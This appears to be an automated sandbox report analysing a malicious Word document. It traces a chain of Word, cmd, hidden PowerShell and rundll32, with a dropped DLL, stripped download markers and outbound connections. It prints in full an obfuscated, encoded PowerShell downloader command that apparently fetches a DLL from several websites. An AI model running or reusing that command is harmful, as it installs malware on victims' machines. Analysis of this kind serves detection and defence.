                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002608D0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002439A0 push cs; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00242A01 push esi; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00245BD8 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00245C29 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024548F push ebp; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00242CFB push ecx; retn 001Eh
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00241740 push DA0FDC41h; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E08D0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C39A0 push cs; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C2A01 push esi; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C5BD8 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C5C29 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C548F push ebp; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C2CFB push ecx; retn 001Eh
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C1740 push DA0FDC41h; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002408D0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002239A0 push cs; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00222A01 push esi; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00225BD8 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00225C29 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0022548F push ebp; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00222CFB push ecx; retn 001Eh
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00221740 push DA0FDC41h; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002108D0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F39A0 push cs; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F2A01 push esi; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F5BD8 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F5C29 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F548F push ebp; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F2CFB push ecx; retn 001Eh

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bwwJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: rundll32.exe, 00000008.00000002.2124359207.00000000006A0000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page execute read | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 51.255.203.164 144
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 84.232.229.24 80
                      Encrypted powershell cmdline option foundShow sources
